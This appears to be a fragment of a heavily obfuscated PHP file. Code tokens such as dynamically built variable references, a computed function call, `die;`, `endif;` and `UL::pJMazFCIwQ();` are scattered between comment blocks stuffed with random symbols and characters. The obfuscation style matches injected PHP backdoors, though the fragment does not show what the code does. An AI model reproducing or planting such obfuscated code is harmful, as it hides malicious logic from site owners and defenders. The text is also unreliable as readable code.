=y☊⋻﹥┶⋺


-*///
1+3/*-xX`r:J-*///
]/*-MT}m-*///
(/*-


°♣《✆⅟


{.WJPat_sq°♣《✆⅟


-*///
$sCzINlvXW/*-
▷（✌✰⋫✢ↆ㊉⑨≘∥∹
&Q-▷（✌✰⋫✢ↆ㊉⑨≘∥∹
-*///
)/*-CfrR-*///
 . /*-Z,!-Q-*///
$aCW/*-


♤㈥▿▇℠⓺¥➁▹✯⒒⑦❥┧⊻⇨◨≈Ⓥ


vm♤㈥▿▇℠⓺¥➁▹✯⒒⑦❥┧⊻⇨◨≈Ⓥ


-*///
[/*-

─✗☜◊ⓨ☺▭✶Ↄ⇊≹⒐｜≏≺❆︷Ⓠ⊧Ⓨ

O><ff─✗☜◊ⓨ☺▭✶Ↄ⇊≹⒐｜≏≺❆︷Ⓠ⊧Ⓨ

-*///
1+7/*-L`&-*///
]/*-


❏◗⑲㊐⓮⓺㊝◆♕㉿◊∜☜█√∛┾»﹀☏Ⅻ￣


Md^p,(z❏◗⑲㊐⓮⓺㊝◆♕㉿◊∜☜█√∛┾»﹀☏Ⅻ￣


-*///
);/*-


◧Ⓦ↙Ⓥ


bQ%◧Ⓦ↙Ⓥ


-*///
/*-&&2-*///
die;/*-
⇣℉≳⒨^❣÷↮∦⊕➽➔⊳㊋╃⋿♞☈
H68G⇣℉≳⒨^❣÷↮∦⊕➽➔⊳㊋╃⋿♞☈
-*///
 endif;/*-


█「‰❺≢◍☬┯∙ⅺⓋ


YnF+4]?█「‰❺≢◍☬┯∙ⅺⓋ


-*///
 }/*-


⅘↗ⓙ㊚≃♬➩


&C⅘↗ⓙ㊚≃♬➩


-*///
}/*-

❾ℓ≣ⅾ❦㍿£⒔⒆☷◙⒡

(|l❾ℓ≣ⅾ❦㍿£⒔⒆☷◙⒡

-*///
UL/*-
❹≬⇏⊃➦ⓨ↯ⓊⓇ
rj$DiM!Y❹≬⇏⊃➦ⓨ↯ⓊⓇ
-*///
::/*-


˜∱ⓓ─╔⋑ℓ⊠⊔


Vgwd?dDh2˜∱ⓓ─╔⋑ℓ⊠⊔


-*///
pJMazFCIwQ/*-NzpK{#y-*///
();/*-C^_psti-*///
 ?>